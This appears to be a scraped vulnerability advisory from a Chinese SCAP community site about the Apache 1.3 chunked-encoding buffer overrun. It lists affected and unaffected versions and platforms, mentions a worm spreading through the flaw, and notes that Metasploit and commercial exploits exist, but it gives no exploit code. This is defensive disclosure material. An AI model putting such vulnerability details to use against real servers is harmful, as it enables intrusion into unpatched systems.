+ Mandriva Linux Mandrake 8.2
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
Apache Software Foundation Apache 1.3.23
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
- Microsoft Windows XP Professional
Apache Software Foundation Apache 1.3.22
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows 2000 Server
+ Microsoft Windows 95
+ Microsoft Windows 98
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP3
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP2
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0 SP1
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Enterprise Server 4.0
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP3
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP2
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0 SP1
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Terminal Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP6
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP5
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP4
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP3
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP2
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0 SP1
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Terminal Server 4.0
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows XP Home
- Microsoft Windows XP Home
- Microsoft Windows XP Professional
- Microsoft Windows XP Professional
Apache Software Foundation Apache 1.3.22
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ OpenPKG OpenPKG 1.0
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
Apache Software Foundation Apache 1.3.20
- HP HP-UX 11.22
- HP HP-UX 11.20
+ MandrakeSoft Single Network Firewall 7.2
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
+ SGI IRIX 6.5.18
+ SGI IRIX 6.5.17
+ SGI IRIX 6.5.16
+ SGI IRIX 6.5.15
+ SGI IRIX 6.5.14 m
+ SGI IRIX 6.5.14 f
+ SGI IRIX 6.5.14
+ SGI IRIX 6.5.13 m
+ SGI IRIX 6.5.13 f
+ SGI IRIX 6.5.13
+ SGI IRIX 6.5.12 m
+ SGI IRIX 6.5.12 f
+ SGI IRIX 6.5.12
+ Slackware Linux 8.0
+ Sun Cobalt Control Station 4100CS
+ Sun Cobalt RaQ 550
+ Sun Solaris 9_x86 Update 2
+ Sun Solaris 9_x86
+ Sun Solaris 9
+ Sun SunOS 5.9 _x86
+ Sun SunOS 5.9
Apache Software Foundation Apache 1.3.20
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Apache Software Foundation Apache 1.3.19
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Apache Software Foundation Apache 1.3.19
- Apple Mac OS X 10.0.3
- Caldera OpenLinux 2.4
+ Debian Linux 2.3
- Digital (Compaq) TRU64/DIGITAL UNIX 5.0
- Digital (Compaq) TRU64/DIGITAL UNIX 4.0 g
- Digital (Compaq) TRU64/DIGITAL UNIX 4.0 f
+ EnGarde Secure Linux 1.0.1
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 3.5.1
- HP HP-UX 11.11
- HP HP-UX 11.0 4
- HP HP-UX 11.0
- HP HP-UX 10.20
+ HP Secure OS software for Linux 1.0
- HP VirtualVault 4.5
+ Mandriva Linux Mandrake 8.1
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- Mandriva Linux Mandrake 7.1
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5
+ OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 2.8
+ OpenBSD OpenBSD 3.0
- Red Hat Linux 6.2
- RedHat Linux 7.1
- RedHat Linux 7.0
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0 ppc
+ S.u.S.E. Linux 7.0 i386
+ S.u.S.E. Linux 7.0 alpha
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4 ppc
+ S.u.S.E. Linux 6.4 i386
+ S.u.S.E. Linux 6.4 alpha
+ S.u.S.E. Linux 6.4
- SCO eDesktop 2.4
- SCO eServer 2.3.1
- SGI IRIX 6.5.9
- SGI IRIX 6.5.8
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Apache Software Foundation Apache 1.3.18
+ Apache Software Foundation Apache 1.1
+ Apache Software Foundation Apache 1.1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional
- Microsoft Windows 95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Apache Software Foundation Apache 1.3.18
Apache Software Foundation Apache 1.3.17
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ OpenBSD OpenBSD 2.8
+ S.u.S.E. Linux 7.1
Apache Software Foundation Apache 1.3.17
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP1

- 不受影响的程序版本

HP Tru64 UNIX Compaq Secure Web Server 5.9.1
Apache Software Foundation Apache 2.0.39
Apache Software Foundation Apache 1.3.26
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
+ OpenPKG OpenPKG 1.1
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
Apache Software Foundation Apache 1.3.26
Apache Software Foundation Apache 1.3.25
Apache Software Foundation Apache 1.3.25

- 漏洞讨论

When processing requests coded with the 'Chunked Encoding' mechanism, Apache fails to properly calculate required buffer sizes. This is believed to be due to improper (signed) interpretation of an unsigned integer value. Consequently, several conditions that have security implications may occur. Reportedly, a buffer overrun and signal race condition occur. Exploiting these conditions may allow arbitrary code to run.

**Update**: Reportedly, at least one worm is exploiting this vulnerability to propagate in the wild. The worm targets FreeBSD 4.5 systems running Apache 1.3.22-24 and 1.3.20. Other versions may also be affected.

- 漏洞利用

Functional exploit code is available.

A Metasploit Framework exploit has become available.

Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

UPDATE (January 11, 2008): An updated exploit for CORE IMPACT is available.

- 解决方案

Please see the referenced advisories for more information and fixes.


Macromedia ColdFusion Server MX Professional

Macromedia ColdFusion Server MX Enterprise

Macromedia ColdFusion Server MX Developer

Apache Software Foundation Apache 1.0

HP Compaq Secure Web Server for OpenVMS 1.0 -1

Apache Software Foundation Apache 1.0.2

Apache Software Foundation Apache 1.0.3

Apache Software Foundation Apache 1.0.5

Apache Software Foundation Apache 1.1

HP Compaq Secure Web Server for OpenVMS 1.1 -1

Apache Software Foundation Apache 1.1.1

HP Compaq Secure Web Server for OpenVMS 1.2

Apache Software Foundation Apache 1.2

Apache Software Foundation Apache 1.2.5

Apache Software Foundation Apache 1.3

Apache Software Foundation Apache 1.3.1

Apache Software Foundation Apache 1.3.11

Apache Software Foundation Apache 1.3.11

Apache Software Foundation Apache 1.3.12

Apache Software Foundation Apache 1.3.12

Apache Software Foundation Apache 1.3.13

Apache Software Foundation Apache 1.3.14

Apache Software Foundation Apache 1.3.14

Apache Software Foundation Apache 1.3.14 Mac

Apache Software Foundation Apache 1.3.15

Apache Software Foundation Apache 1.3.16

Apache Software Foundation Apache 1.3.17

Apache Software Foundation Apache 1.3.17

Apache Software Foundation Apache 1.3.18

Apache Software Foundation Apache 1.3.18

Apache Software Foundation Apache 1.3.19

Apache Software Foundation Apache 1.3.19

Apache Software Foundation Apache 1.3.20

Apache Software Foundation Apache 1.3.20

Apache Software Foundation Apache 1.3.22

Apache Software Foundation Apache 1.3.22

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站